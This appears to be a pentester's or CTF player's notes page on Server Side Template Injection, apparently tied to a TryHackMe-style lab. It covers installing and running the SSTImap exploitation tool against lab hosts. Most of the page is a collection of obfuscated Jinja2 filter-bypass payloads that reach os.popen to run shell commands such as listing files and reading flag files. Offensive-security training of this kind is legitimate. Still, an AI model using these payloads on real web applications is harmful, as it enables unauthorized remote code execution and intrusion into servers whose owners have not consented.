Skip to content

Server Side Template Injection (SSTI)

Description

Server Side Template Injection (SSTI) is a vulnerability that occurs when an application allows an attacker to inject arbitrary code into a template engine. This can lead to the execution of unauthorized code on the server.

Automation

SSTImap is a tool designed to automate the testing and exploitation of SSTI vulnerabilities in various template engines. It is hosted on GitHub and provides a framework for identifying template injection flaws.

If you are using AttackBox, the tool is installed in the /opt/SSTImap directory. If you are using your own machine, you can install it by cloning the repository from GitHub and setting up the environment. Follow these steps to get started:

Install the tool:

git clone https://github.com/vladko312/SSTImap.git
cd SSTImap
pip install -r requirements.txt

Run the tool: 

python3 sstimap.py -X POST -u 'http://ssti.thm:8002/mako/' -d 'page='

You can craft more complex payloads and customize the tool according to your requirements.

python3 sstimap.py --url http://ssti.thm:8080/admin/forms/edit/index.php -d "page=views&group_name_6=*&update_views=Update&view_list_sortable__rows=6%7C2&view_list_sortable__new_groups=2&view_list_sortable__deleted_rows="   --cookie "PHPSESSID=c430c21eafbba60b6c7261d69b786763"

Jinja2 SSTI

Jinja2 is a popular template engine for Python. It is used in various web frameworks, such as Flask and Django.

Bypassing SSTI Filters

https://0day.work/jinja2-template-injection-filter-bypasses/

{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls${IFS}-l')|attr('read')()%}{%print(a)%}{%endwith%}

{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls${IFS}-l')|attr('read')()%}{%print(a)%}{%endwith%}

{%with a=request|attr("application")|attr((request|attr("args")|attr("get")("unders"),"globals",request|attr("args")|attr("get")("unders"))|join)|attr((request|attr("args")|attr("get")("unders"),"getitem",request|attr("args")|attr("get")("unders"))|join)((request|attr("args")|attr("get")("unders"),"builtins",request|attr("args")|attr("get")("unders"))|join)|attr((request|attr("args")|attr("get")("unders"),"getitem",request|attr("args")|attr("get")("unders"))|join)((request|attr("args")|attr("get")("unders"),"import",request|attr("args")|attr("get")("unders"))|join)('os')|attr('popen')('cat${IFS}/flag*')|attr('read')()%}{%print(a)%}{%endwith%}&unders=__

http://localhost:5000/?exploit={{request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)}}&class=class&usc=_

((request|attr("args")|attr("get")("unders"),"getitem",request|attr("args")|attr("get")("unders"))|join)
((request|attr("args")|attr("get")("unders"),"import",request|attr("args")|attr("get")("unders"))|join)
request.args.get globals=__globals__&getitem=__getitem__&builtins=__builtins__&import=__import__

{%with globals=request|attr("args")|attr("get")("unders")%}{%endwith%}
{%with getitem=request|attr("args")|attr("get")("getitem")%}{%endwith%}
{%with builtins=request|attr("args")|attr("get")("builtins")%}{%endwith%}
{%with import=request|attr("args")|attr("get")("import")%}{%endwith%}
{%with a=request|attr("application")|attr(globals)|attr(getitem)(builtins)|attr(getitem)(import)('os')|attr('popen')('ls${IFS}-l')|attr('read')()%}{%print(a)%}{%endwith%}
{%print(a)%}{%endwith%}

request.environ

((request.args.usc*2,request.args.class,request.args.usc*2)|join)

{%with e=request|attr("args")|attr("get")("env")%}{%endwith%}
{%with a=request|attr(e)%}
{%print(a)%}{%endwith%}

{%with globals=request|attr("args")|attr("get")("globals")%}{%with getitem=request|attr("args")|attr("get")("getitem")%}{%with builtins=request|attr("args")|attr("get")("builtins")%}{%with import=request|attr("args")|attr("get")("import")%}{%with a=request|attr("application")|attr(globals)|attr(getitem)(builtins)|attr(getitem)(import)('os')|attr('popen')('ls${IFS}-l')|attr('read')()%}{%print(a)%}{%endwith%}&globals=__globals__&getitem=__getitem__&builtins=__builtins__&import=__import__